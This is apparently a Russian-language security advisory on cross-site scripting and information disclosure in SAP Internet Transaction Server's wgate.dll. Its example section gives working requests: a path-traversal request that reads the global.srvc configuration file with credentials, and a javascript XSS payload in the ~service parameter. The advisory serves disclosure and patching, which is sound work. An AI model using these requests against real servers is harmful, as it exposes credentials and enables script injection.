Межсайтовый скриптинг и раскрытие информации в SAP Internet Transaction Server

Дата публикации:
02.09.2003
Дата изменения:
08.05.2008
Всего просмотров:
843
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SAP Internet Transaction Server (ITS)

Программа: SAP Internet Transcaction Server Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в SAP Internet Transaction Server (ITS). Удаленный атакующий может раскрыть различную информацию и выполнить XSS нападение.

Все уязвимости обнаружены в "wgate.dll" и связаны с недостаточной фильтрацией пользовательских данных в the "~service", "~templatelanguage", "~language", "~theme", и "~template" параметрах. В результате сервер может:

  1. Возвратить сообщение об ошибке, в которой содержится системная информация об операционной системе, версии программного обеспечения и структуре директорий, если представлены некорректные параметры.
  2. Раскрыть содержание произвольных файлов, представляя специально обработанное значение для "~theme" и "~template" параметров. В результате удаленный пользователь может получить доступ к конфигурационному файлу "global.srvc", который содержит имя пользователя и шифрованные пароли.
  3. Выполнить XSS нападение, представляя произвольный код сценария в параметре "~service".

Пример/Эксплоит:

1.

Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2.
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc+++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++
++
3.
 
http://www.server.name/scripts/wgate.dll?

with params:
~service=--><img%09src=javascript:alert(1)%3bcrap

URL производителя:http://www.sap.com

Решение:

Sap выпустил патчи 598074, 595383, и 654038, которые можно скачать с сайта производителя.

Ссылки: Security REPORT SAP Internet Transcaction Server
или введите имя

CAPTCHA